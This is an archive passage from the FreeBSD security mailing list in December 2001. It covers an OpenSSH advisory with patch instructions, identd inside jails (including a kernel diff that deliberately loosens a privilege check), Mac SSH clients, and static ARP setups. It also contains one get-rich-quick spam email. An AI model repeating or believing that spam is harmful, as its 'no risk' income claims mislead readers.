After modifying the sshd configuration file, the sshd daemon must be
restarted by executing the following command as root:

# kill -HUP `cat /var/run/sshd.pid`

V.   Solution

1) Upgrade the vulnerable system to 4.3-RELEASEp21, 4.4-RELEASEp1, or
4.4-STABLE after the correction date, or patch your current system
source code and rebuild.

2) FreeBSD 4.x systems prior to the correction date:

The following patch has been verified to apply to FreeBSD
4.3-RELEASE, 4.4-RELEASE, and 4.4-STABLE dated prior to the
correction date.  It may or may not apply to older, unsupported
versions of FreeBSD.

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:63/sshd.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:63/sshd.patch.asc

Execute the following commands as root:

# cd /usr/src/crypto/openssh
# patch < /path/to/sshd.patch
# cd /usr/src/secure/lib/libssh
# make depend && make all
# cd /usr/src/secure/usr.sbin/sshd
# make depend && make all install

3) FreeBSD 4.4-RELEASE systems:

An experimental upgrade package is available for users who wish to
provide testing and feedback on the binary upgrade process.  This
package may be installed on FreeBSD 4.4-RELEASE systems only, and is
intended for use on systems for which source patching is not practical
or convenient.

If you use the upgrade package, feedback (positive or negative) to
security-officer@FreeBSD.org is requested so we can improve the
process for future advisories.

During the installation procedure, backup copies are made of the files
which are replaced by the package.  These backup copies will be
reinstalled if the package is removed, reverting the system to a
pre-patched state.  In addition, the package automatically restarts
the sshd daemon if it is running.

Three versions of the upgrade package are available, depending on
whether or not the system has the kerberosIV or kerberos5
distributions installed.

3a) For systems without kerberosIV or kerberos5 installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-01.63.tgz

3b) For systems with kerberosIV only installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-kerberosIV-01.63.tgz

3c) For systems with kerberos5 only installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberos5-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberos5-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-kerberos5-01.63.tgz

3d) For systems with both kerberosIV and kerberos5 installed:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-kerberos5-01.63.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-kerberos5-01.63.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-sshd-kerberosIV-kerberos5-01.63.tgz

[Ports collection]

One of the following:

1) Upgrade your entire ports collection and rebuild the OpenSSH port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/openssh-3.0.2.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/openssh-3.0.2.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

NOTE: It may be several days before updated packages are available. Be
sure to check the file creation date on the package, because the
version number of the software has not changed.

3) Download a new port skeleton for the openssh port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz

VI. Correction details

Path                                                             Revision
  Branch
- -------------------------------------------------------------------------
src/crypto/openssh/session.c
  HEAD                                                               1.18
  RELENG_4                                                       1.4.2.11
  RELENG_4_4                                                  1.4.2.8.4.1
  RELENG_4_3                                                  1.4.2.8.2.1
src/crypto/openssh/version.h
  HEAD                                                                1.9
  RELENG_4                                                    1.1.1.1.2.7
  RELENG_4_4                                              1.1.1.1.2.5.2.1
  RELENG_4_3                                              1.1.1.1.2.4.2.1
ports/security/openssh/Makefile                                      1.79
- -------------------------------------------------------------------------

For OpenSSH included in the base system, there is a version string
indicating which FreeBSD localizations are available.  The following
table lists the version strings for each branch which include this
security fix:

Branch                                                     Version string
- -------------------------------------------------------------------------
HEAD                         OpenSSH_2.9 FreeBSD localisations 20011202
RELENG_4                     OpenSSH_2.9 FreeBSD localisations 20011202
RELENG_4_4                   OpenSSH_2.3.0 FreeBSD localisations 20011202
RELENG_4_3                   OpenSSH_2.3.0 green@FreeBSD.org 20011202
- -------------------------------------------------------------------------

To view the version string of the OpenSSH server, execute the following
command:

  % /usr/sbin/sshd -\?

The version string is also displayed when a client connects to the
server.

VII. References

<URL:http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c#rev1.110>
-----BEGIN PGP SIGNATURE-----
Comment: http://www.nectar.cc/pgp

iQCVAwUBPBC1VlUuHi5z0oilAQHNQAQAhKLEjAAb5W7HMnqbNpKJWSsPQKDuspYB
N76xiTuzNmS1EFQXgoTlCFD3GZtXsBiiXImxUemyvCA+7yqhhVJIoz43JUa6ts/y
1/KES4LVO1PS/HMBgaywbX5zdtdUzMe1kBVkE6FJeMHQN6RFdOPKe9a2Kx41GlvC
9naCzrq/Pg4=
=w2iN
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7  8:53:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50])
	by hub.freebsd.org (Postfix) with ESMTP
	id 40EDD37B417; Fri,  7 Dec 2001 08:53:12 -0800 (PST)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3])
	by fledge.watson.org (8.11.6/8.11.5) with SMTP id fB7Gqwi43953;
	Fri, 7 Dec 2001 11:52:58 -0500 (EST)
	(envelope-from robert@fledge.watson.org)
Date: Fri, 7 Dec 2001 11:52:57 -0500 (EST)
From: Robert Watson <rwatson@FreeBSD.ORG>
X-Sender: robert@fledge.watson.org
To: "Crist J . Clark" <cjc@FreeBSD.ORG>
Cc: alexus <ml@db.nexgen.com>, freebsd-security@FreeBSD.ORG
Subject: Re: identd inside of jail
In-Reply-To: <20011206003719.S3061@blossom.cjclark.org>
Message-ID: <Pine.NEB.3.96L.1011207115009.42818D-100000@fledge.watson.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


This problem is fixed in 5.0-CURRENT as it performs two checks in udp and
tcp getcred: first, it checks for privilege (and permits the jail to
succeed), and second, it checks whether the connection in question is
visible to the current jail.  I do not currently plan to merge these
changes to -STABLE, as they rely on changes merging the pcred and ucred
structures, which in turn depend on a lot of other changes throughout the
kernel in 5.0-CURRENT.  As a follow-up note, the credential management
code in 5.0-CURRENT is substantially rewritten, and the result is much
better enforcement of process and resource visibility, both from the
perspective of jail, and from limiting users from seeing resources created
by other users (such as TCP connections) when dictated by policy.

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

On Thu, 6 Dec 2001, Crist J . Clark wrote:

> On Wed, Dec 05, 2001 at 06:44:26PM -0500, alexus wrote:
> > Hello
> > 
> > I'm posting on this thread on this list due to jail itself is a security
> > related issue, if this is wrong list i'll repost it on another list.
> > 
> > did anyone sucseed on making identd (from inetd) or any other identd to work
> > inside of jail?
> 
> I don't think the auth service in inetd(8) will work in a jail. I
> believe the "net.inet.tcp.getcred" sysctl(3) fails.
> 
> > the identd itself is working, however to make it work for outside world too
> > i put forward for port 113 using natd
> > 
> > su-2.05# grep 113 /etc/natd.conf
> > redirect_port tcp jail:113 113
> 
> And running it through a NATing gateway opens up a whole bunch of other
> issues that have nothing to do with jail(8).
> -- 
> "It's always funny until someone gets hurt. Then it's hilarious."
> 
> Crist J. Clark                     |     cjclark@alum.mit.edu
>                                    |     cjclark@jhu.edu
> http://people.freebsd.org/~cjc/    |     cjc@freebsd.org
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7  8:57: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50])
	by hub.freebsd.org (Postfix) with ESMTP id 84A8F37B416
	for <freebsd-security@freebsd.org>; Fri,  7 Dec 2001 08:56:56 -0800 (PST)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3])
	by fledge.watson.org (8.11.6/8.11.5) with SMTP id fB7GuNi44030;
	Fri, 7 Dec 2001 11:56:23 -0500 (EST)
	(envelope-from robert@fledge.watson.org)
Date: Fri, 7 Dec 2001 11:56:23 -0500 (EST)
From: Robert Watson <rwatson@freebsd.org>
X-Sender: robert@fledge.watson.org
To: alexus <ml@db.nexgen.com>
Cc: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
	freebsd-security@freebsd.org
Subject: Re: identd inside of jail
In-Reply-To: <00d101c17e67$c8029bf0$0d00a8c0@alexus>
Message-ID: <Pine.NEB.3.96L.1011207115316.42818E-100000@fledge.watson.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

What NAT package you use shouldn't make any difference inside jail on
4-STABLE: the getcred calls in question are simply not permitted from
within jail on 4.x.  If you want a cheap hack to let ident work in jail,
at the cost of leaking information to the jail about connections from
outside that jail, you can modify the suser() calls in
src/sys/netinet/{tcp_subr.c,udp_subr.c} to call suser_xxx() with the
PRISON_ROOT flag set instead.   The patch would look something like this:

Index: tcp_subr.c
===================================================================
RCS file: /home/ncvs/src/sys/netinet/tcp_subr.c,v
retrieving revision 1.73.2.22
diff -u -r1.73.2.22 tcp_subr.c
--- tcp_subr.c  22 Aug 2001 00:59:12 -0000      1.73.2.22
+++ tcp_subr.c  7 Dec 2001 16:56:23 -0000
@@ -910,7 +910,7 @@
        struct inpcb *inp;
        int error, s;
 
-       error = suser(req->p);
+       error = suser_xxx(NULL, req->p, PRISON_ROOT);
        if (error)
                return (error);
        error = SYSCTL_IN(req, addrs, sizeof(addrs));


Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

On Thu, 6 Dec 2001, alexus wrote:

> i've tryed ident2 .. it won't work
> 
> i heard that any identd will work inside of jail if you using ipf/ipnat and
> they won't work w/ ipfw/natd
> 
> are you using ipfw/natd ? or ipf/ipnat?
> 
> ----- Original Message -----
> From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
> To: "alexus" <ml@db.nexgen.com>
> Cc: <freebsd-security@freebsd.org>
> Sent: Thursday, December 06, 2001 3:19 AM
> Subject: Re: identd inside of jail
> 
> 
> > On Thursday 06 December 2001 00:44, you wrote:
> > > did anyone sucseed on making identd (from inetd) or any other identd to
> > > work inside of jail?
> >
> > use ident2 from ports. it works fine in jail.
> >
> > --
> > * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> > * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
> >
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7 19:53:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web11808.mail.yahoo.com (web11808.mail.yahoo.com [216.136.172.162])
	by hub.freebsd.org (Postfix) with SMTP id 073B437B416
	for <security@freebsd.org>; Fri,  7 Dec 2001 19:53:14 -0800 (PST)
Message-ID: <20011208035313.31055.qmail@web11808.mail.yahoo.com>
Received: from [216.170.168.74] by web11808.mail.yahoo.com via HTTP; Fri, 07 Dec 2001 19:53:13 PST
Date: Fri, 7 Dec 2001 19:53:13 -0800 (PST)
From: X Philius <xphilius@yahoo.com>
Reply-To: xphilius@yahoo.com
Subject: Anyone know Free Mac OS 9.xx SSH2 client??
To: security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Folks,
I know there was recently a discussion about SSH clients for the
Windows world, but I am having a devil of a time finding  a free one
for the Mac. I have a demo copy of  the Data Fellows client, and it is
the only one I can get to work with Open SSH2 and public key auth on my
BSD box. Besides the fact that it costs (not too much, really ;-) I
don't really like the interface and options (you can't change colors
and fonts on the Mac version to get that black/green old school
terminal look ;-). I have tried MacSSH (based on the classic Better
Telnet) and it works for regular password logins, but not with a public
key.  It always fails with this error (from the server log):

Dec  5 22:07:06 myserver sshd[44444]: bad pkalg spki-sign-dss
Dec  5 22:07:06 myserver sshd[44444]: Failed publickey for me from
xxx.xxx.xxx.xxx port 49157 ssh2

Of course, Open SSH from the cli in OS X works fine, but I can't boot
to OS X all the time, not enough apps yet. Any one have any
suggestions? I am afraid no one will ever develop a killer SSH client
for the Classic environment, with OS X on the way.

Jason


__________________________________________________
Do You Yahoo!?
Send your FREE holiday greetings online!
http://greetings.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7 19:56:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.hq.newdream.net (mail.hq.newdream.net [216.246.35.10])
	by hub.freebsd.org (Postfix) with ESMTP id 46F7037B419
	for <security@freebsd.org>; Fri,  7 Dec 2001 19:56:54 -0800 (PST)
Received: from zugzug.hq.newdream.net (zugzug.hq.newdream.net [127.0.0.1])
	by ravscan.zugzug.hq.newdream.net (Postfix) with SMTP id 1EE343B2F6
	for <security@freebsd.org>; Fri,  7 Dec 2001 19:56:54 -0800 (PST)
Received: by mail.hq.newdream.net (Postfix, from userid 1012)
	id EE5453B2E3; Fri,  7 Dec 2001 19:56:53 -0800 (PST)
Date: Fri, 7 Dec 2001 19:56:53 -0800
From: Owner of many system processes <william@hq.newdream.net>
To: security@freebsd.org
Subject: Re: Anyone know Free Mac OS 9.xx SSH2 client??
Message-ID: <20011208035653.GB742@hq.newdream.net>
Mail-Followup-To: security@freebsd.org
References: <20011208035313.31055.qmail@web11808.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20011208035313.31055.qmail@web11808.mail.yahoo.com>
User-Agent: Mutt/1.3.24i
Organization: New Dream Network
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

X Philius wrote:
> 
> Of course, Open SSH from the cli in OS X works fine, but I can't boot
> to OS X all the time, not enough apps yet. Any one have any
> suggestions? I am afraid no one will ever develop a killer SSH client
> for the Classic environment, with OS X on the way.

i find this client:

http://www.macsecsh.com/

(linked from: http://www.freessh.org/other.html)

to be pretty nice.  they also have a beta sftp client (although it won't
be free eventually).

i've used nifty telnet /ssh too but i'm not sure if it supports v2.

HTH...

-- 
William Yardley                   System Administrator, Newdream Network
william@hq.newdream.net         http://infinitejazz.net/will/pgp/gpg.asc

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7 23:12: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web11801.mail.yahoo.com (web11801.mail.yahoo.com [216.136.172.155])
	by hub.freebsd.org (Postfix) with SMTP id EF9DF37B419
	for <security@freebsd.org>; Fri,  7 Dec 2001 23:11:55 -0800 (PST)
Message-ID: <20011208071154.72128.qmail@web11801.mail.yahoo.com>
Received: from [216.170.168.74] by web11801.mail.yahoo.com via HTTP; Fri, 07 Dec 2001 23:11:54 PST
Date: Fri, 7 Dec 2001 23:11:54 -0800 (PST)
From: X Philius <xphilius@yahoo.com>
Reply-To: xphilius@yahoo.com
Subject: Re: Anyone know Free Mac OS 9.xx SSH2 client??
To: micheas <micheas@micheas.dyns.net>
Cc: security@freebsd.org
In-Reply-To: <1007784164.21180.6.camel@tux>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Micheas,
But have you managed to use it with public key authentication, SSH2 DSA
type? I have used MacSSH, and it works fine for SSH2 with password
auth, but I get the error described below when I try to use public key
auth.

Jason

--- micheas <micheas@micheas.dyns.net> wrote:
> macssh is a gpl product that I find usefull
> 
> http://macssh.com
> 
--- xphilius
I have tried MacSSH (based on the classic Better
> > Telnet) and it works for regular password logins, but not with a
> public key.  It always fails with this error (from the server log):
> > Dec  5 22:07:06 myserver sshd[44444]: bad pkalg spki-sign-dss
> > Dec  5 22:07:06 myserver sshd[44444]: Failed publickey for me from
> > xxx.xxx.xxx.xxx port 49157 ssh2


__________________________________________________
Do You Yahoo!?
Send your FREE holiday greetings online!
http://greetings.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7 23:35:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from D00015.dialonly.kemerovo.su (www2.svzserv.kemerovo.su [213.184.65.86])
	by hub.freebsd.org (Postfix) with ESMTP
	id 2FEB137B419; Fri,  7 Dec 2001 23:35:43 -0800 (PST)
Received: from svzserv.kemerovo.su (localhost.dialonly.kemerovo.su [127.0.0.1])
	by D00015.dialonly.kemerovo.su (8.11.6/8.11.4) with ESMTP id fB87XVU01155;
	Sat, 8 Dec 2001 14:33:31 +0700 (KRAT)
	(envelope-from eugen@svzserv.kemerovo.su)
Message-ID: <3C11C24B.A980A646@svzserv.kemerovo.su>
Date: Sat, 08 Dec 2001 14:33:31 +0700
From: Eugene Grosbein <eugen@svzserv.kemerovo.su>
Organization: SVZServ
X-Mailer: Mozilla 4.76 [ru] (X11; U; FreeBSD 4.4-STABLE i386)
X-Accept-Language: ru, en
MIME-Version: 1.0
To: Ruslan Ermilov <ru@FreeBSD.ORG>
Cc: net@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com> <20011205204526.B89520@sunbay.com> <200112051852.fB5IqmH95809@whizzo.transsys.com> <20011205121928.A3061@blossom.cjclark.org> <200112062059.MAA02282@windsor.research.att.com> <20011207110542.J13705@sunbay.com>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> OK, I have a proposal that should fit both opinions.  I'll keep the
> net.link.ether.inet.static_arp to mean what it means now (keep ARP
> table static, no updates except from local process through a routing
> socket writes), and will add another sysctl that will switch the
> meaning of IFF_NOARP from "no arp" to "static arp on this interface".
> How about this?

This would be the best souliution at least for us :-)

Eugene Grosbein

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7 23:52:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from D00015.dialonly.kemerovo.su (www2.svzserv.kemerovo.su [213.184.65.86])
	by hub.freebsd.org (Postfix) with ESMTP
	id 8E62C37B416; Fri,  7 Dec 2001 23:52:11 -0800 (PST)
Received: from svzserv.kemerovo.su (localhost.dialonly.kemerovo.su [127.0.0.1])
	by D00015.dialonly.kemerovo.su (8.11.6/8.11.4) with ESMTP id fB87pil01437;
	Sat, 8 Dec 2001 14:51:44 +0700 (KRAT)
	(envelope-from eugen@svzserv.kemerovo.su)
Message-ID: <3C11C690.A520577@svzserv.kemerovo.su>
Date: Sat, 08 Dec 2001 14:51:44 +0700
From: Eugene Grosbein <eugen@svzserv.kemerovo.su>
Organization: SVZServ
X-Mailer: Mozilla 4.76 [ru] (X11; U; FreeBSD 4.4-STABLE i386)
X-Accept-Language: ru, en
MIME-Version: 1.0
To: cjclark@alum.mit.edu
Cc: Bill Fenner <fenner@research.att.com>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com> <20011205204526.B89520@sunbay.com> <200112051852.fB5IqmH95809@whizzo.transsys.com> <20011205121928.A3061@blossom.cjclark.org> <200112062059.MAA02282@windsor.research.att.com> <20011206231401.N8975@blossom.cjclark.org>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> If this is really want to do, I believe you can do it with existing
> tools.
> 
> For simplicity, I'm just going to illustrate a way to set it up rather
> than explain it. Store your IP-MAC address pairs in flat file as
> proscribed in arp(8),
> 
>         192.168.10.2    01:02:03:10:11:12
>         192.168.10.4    01:02:03:21:22:23
>         ...
> 
> Load your permanent ARP table with a simple,
> 
>         arp -f arp_list.txt
> 
> In the startup and include,
> 
>         while read $IP $MAC; do
>                 ipfw add pass ip from $IP to any via if0
>                 ipfw add pass ip from any to $IP via if0
>         done < arp_list.txt
> 
>         ipfw add deny ip from any to any via if0
> 
> In your rc.firewall.
> 
> Now you have a static ARP table and all traffic not from those IP
> addresses is blocked. Since we never ARP for any other addresses, the
> packets are blocked before we ARP for them, we never get other entries
> in the ARP table.

Yes, this should work. But we have many clients at the interface and IPFW
table pollution
is undesirable. This also increases complexity of IPWF configuration and
this complexity seems to be ill-founded (at least for me) as we have a way to
ignore APR.
At the other hand ingorance of false ARP replies will make ARP spoofing
useless at least
if MAC addresses have not changed. Administrative arrangements and arpwatch
helps us 
to deal with such klever users.

> At least I think this should do what you want. I still am not quite
> sure what a "one-way ARP" is supposed to gain.

We need gateway be usable for our clients without forcing them to use static
ARP themselves.
We do not want to see unregistered machines in public segment.
We also will be happy keeping our registration procedures, configs and kernel
tables
as simple as possible.

Sysctl changing the meaning of IFF_NOARP flags would be nice solution.

Eugene Grosbein

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sat Dec  8  4:30:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from matrix.seed.net.tw (matrix.seed.net.tw [192.72.81.219])
	by hub.freebsd.org (Postfix) with ESMTP
	id 05EEE37B41F; Sat,  8 Dec 2001 04:30:19 -0800 (PST)
Received: from [210.243.240.115] (helo=isomain01.isotech.com.tw)
	by mail.seed.net.tw with esmtp (SEEDNet Mail Server v2.316f)
	id 16CgcS-000Id3-00; Sat, 08 Dec 2001 20:30:16 +0800
Received: from da001d0349.lax-ca.osd.concentric.net ([64.0.145.94]) by isomain01.isotech.com.tw with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id Y1XCMQP7; Sat, 8 Dec 2001 20:32:22 +0800
From: <ebook_001@bigfoot.com>
Message-Id: <h5oxntUgLKwuAWr9.hLWFpu.hTzmYf6u.hXWh.hXJmH.hRi-Ji.heJRXumA.hT3U0u.hRiC.h5oxntUgL8w47Dxr-.h5oxntUgLWksSYxk8I.hUAOn@>
Subject: We will show you how to become self-employed             
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Date: Sat, 8 Dec 2001 04:32:32
To: undisclosed-recipients:;
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


<html>
<head>
   
   <title>$10K in 30 Days!!</title>
</head>
<body>

<p>&nbsp;</p>
<p><center><b><font size=+1><font color="#000000">I'll
Show <u>YOU</u> How To Make At Least....</font><font color="#FF0000"></font></font></b>
<br><b><font face="Arial,Helvetica"><font size=+1><font color="#FF0000">$10,000
In 30 Days </font><font color="#000000">or Less Every Month... NO RISK!!!</font></font></font></b></center>

<br><font face="Arial,Helvetica"><font color="#000000"><font size=+1></font></font></font>&nbsp;
<center></p>
<table>
<tr>
<td>
<center><img SRC="http://members.tripod.co.kr/inciotji/couple.jpg" width="135" height="150"></center>
</td>

<td>
<center><b><font face="Arial,Helvetica">Would you like to make at least
<font color="#FF0000">$10,000</font></font></b>
<br><b><font face="Arial,Helvetica">(in 30 days or less) every month?&nbsp;</font></b>
<br><b><font face="Arial,Helvetica">Here's how you can make that money&nbsp;&nbsp;</font></b>
<br><b><font face="Arial,Helvetica">(and more... ) every month, and make&nbsp;&nbsp;</font></b>
<br><b><font face="Arial,Helvetica">your first <font color="#FF0000">$10,000</font>
in 30 days or less&nbsp;&nbsp;</font></b>
<br><b><font face="Arial,Helvetica">- with absolutely no risk!</font></b>
<br><b><font face="Arial,Helvetica"><a href="http://www.secrets-2-success.net/">Click
Here For Complete Details!</a></font></b></center>
</td>
</tr>
</table></center>
<font face="Arial,Helvetica"></font>
<p align="center"><br>
</p>
<p align="center">If you have received this message in error and wish to be<br>
&nbsp;removed from future mailings <a href="mailto:priscillasfl@spacemail.com">CLICK
HERE</a></p>

</body>
</html>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sat Dec  8  6:23: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lily.ezo.net (lily.ezo.net [206.102.130.13])
	by hub.freebsd.org (Postfix) with ESMTP id 03F1037B417
	for <security@FreeBSD.ORG>; Sat,  8 Dec 2001 06:23:02 -0800 (PST)
